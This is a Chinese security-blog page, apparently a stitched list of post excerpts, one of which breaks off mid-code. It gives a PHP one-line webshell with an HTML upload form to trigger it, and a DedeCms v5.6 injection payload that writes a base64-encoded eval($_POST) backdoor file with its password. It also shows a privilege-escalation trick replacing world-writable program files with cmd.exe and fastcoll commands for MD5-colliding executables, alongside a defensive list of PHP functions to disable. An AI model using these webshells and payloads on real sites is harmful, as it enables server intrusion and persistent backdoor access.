现在的服务器安全越来越BT了,事实证明站长们也开始重视安全了,但是还是有一些细节注定成败,比如下面的一些危险文件夹,如果没有做好安全,很可能服务器就被入侵了。
众所周知要成功提权服务器,就要找到可写可执行目录,可近来服务器的目录设置越来越BT,几乎没有可写可执行目录。另一个“提权思路”出现了。寻找服务器 上安装的第3方软件某些文件的权限问题来进行文件替换,将这些文件替换为我们的cmd.exe和cscript.exe来提权,经我测试发现以下服务器常 用软件的某些文件权限为Everyone即为所有用户权限,可以修改,可以上传同文件名替换,删除,最重要的是还可以执行。
文件上传漏洞之图片缩略图
作者:admin 日期:2020-03-01
58同城访问过频繁验证码突破
作者:admin 日期:2016-05-06
Web应用开发人员最易犯的九个安全错误
作者:admin 日期:2015-05-27
另类PHP一句话小马
作者:admin 日期:2014-06-16
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。
<?php @include($_FILES['u']['tmp_name']);
使用方式也简单构造一个html文件写入如下代码:
<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data"> <input type="file" name='u'> <button>shell</button> </form> from: <a href="http://www.zeroplace.cn/">www.zeroplace.cn</a>
选择你的php大马点shell运行
我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。
正确设置php-fpm和nginx防止网站被黑
作者:admin 日期:2014-05-19
一些需要禁用的PHP危险函数(disable_functions)
作者:admin 日期:2014-04-27
phpinfo()
功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。
危险等级:中
passthru()
功能描述:允许执行一个外部程序并回显输出,类似于 exec()。
危险等级:高
exec()
功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。
危险等级:高
system()
功能描述:允许执行一个外部程序并回显输出,类似于 passthru()。
危险等级:高
chroot()
功能描述:可改变当前 PHP 进程的工作根目录,仅当系统支持 CLI 模式
PHP 时才能工作,且该函数不适用于 Windows 系统。
危险等级:高
scandir()
功能描述:列出指定路径中的文件和目录。
危险等级:中
fastcoll 生成两个md5值一样的文件
作者:admin 日期:2014-02-22
这个工具的出现彻底宣布了md5的死亡
下面介绍使用方法:
首先准备工具: md5校验工具, 一个notepad.exe程序, fastcoll_v1.0.0.5.exe
1. 找到一个可执行文件, 我们以它的文件内容为前缀,这里我选择的是windows下的notepad.exe
2.打开cmd命令行: fastcoll_v1.0.0.5.exe -p notepad.exe -o notepad1.exe notepad2.exe, 此时生成两个文件notepad1.exe和notepad2.exe, 而此时发现这两个文件都同notepad.exe一样是可以运行的
Tags: md5
针对JS对象数组的Array排序实现
作者:admin 日期:2013-06-06
这里只实现了冒泡排序和快速排序,一般来说也够用了
/* * 对Array进行排序 */ var CMPMETHOD = { btTimeCmp: function(a, b) { a=a.replace("天", ""); b=b.replace("天", ""); var as = a.split("年"); var bs = b.split("年"); var ayear = as.length > 1 ? as[0] : 0; var aday = as.length > 1 ? as[1] : parseInt(as[0]); var byear = bs.length > 1 ? bs[0] : 0; var bday = bs.length > 1 ? bs[1] : parseInt(bs[0]); var va = ayear * 365 + parseInt(aday); var vb = byear * 365 + parseInt(bday); if (va > vb ) return 1; if (va < vb ) return -1; if (va == vb) return 0; }, numberCmp: function(a, b) { a = parseFloat(a); b = parseFloat(b); return CMPMETHOD.commonCmp(a, b); }, commonCmp: function(a, b){ if (a < b) return -1; if (a == b) return 0; if (a > b) return 1; } } Array.prototype.swap = function(i, j) { var temp = this[i]; this[i] = this[j]; this[j] = temp; } Array.prototype.quickSort = function() { var s=null, e=null, k=null, cmp=CMPMETHOD.commonCmp; if (arguments.length == 1) { s = null; e = null; k =arguments[0]; } if (arguments.length == 2 ) { s = arguments[0]; e = arguments[1]; } if (arguments.length == 3) { s = arguments[0]; e = arguments[1]; k = arguments[2]; } if (arguments.length == 4) { s = arguments[0]; e = arguments[1]; k = arguments[2]; cmp = arguments[3]; } if (s == null ) s = 0; if (e == null ) e = this.length-1; if (s >= e) return ; var x = s; //基准索引 var i, j; i = s; j = e; while(j > i) { for(; j>i; j--) { if (cmp(this[j][k], this[x][k]) < 0) { this.swap(j, x); x = j; break; } } for(; i
windows2003基本权限设置
作者:admin 日期:2012-05-01
ICACLS命令
作者:admin 日期:2012-05-01
DEDE5.7 爆出后门
作者:admin 日期:2012-04-25
MySQL:如何编写UDF
作者:admin 日期:2012-04-21
mysql复制文件
作者:admin 日期:2012-04-20
淘宝开放平台新的授权验证方式
作者:admin 日期:2012-04-18
Windwos下hacker学习流程图
作者:admin 日期:2012-02-12
DedeCms v5.6 恶意代码执行漏洞
作者:admin 日期:2012-02-09
影响版本:
DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
测试方法:
注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="'']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="'']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得SEBUG安全建议: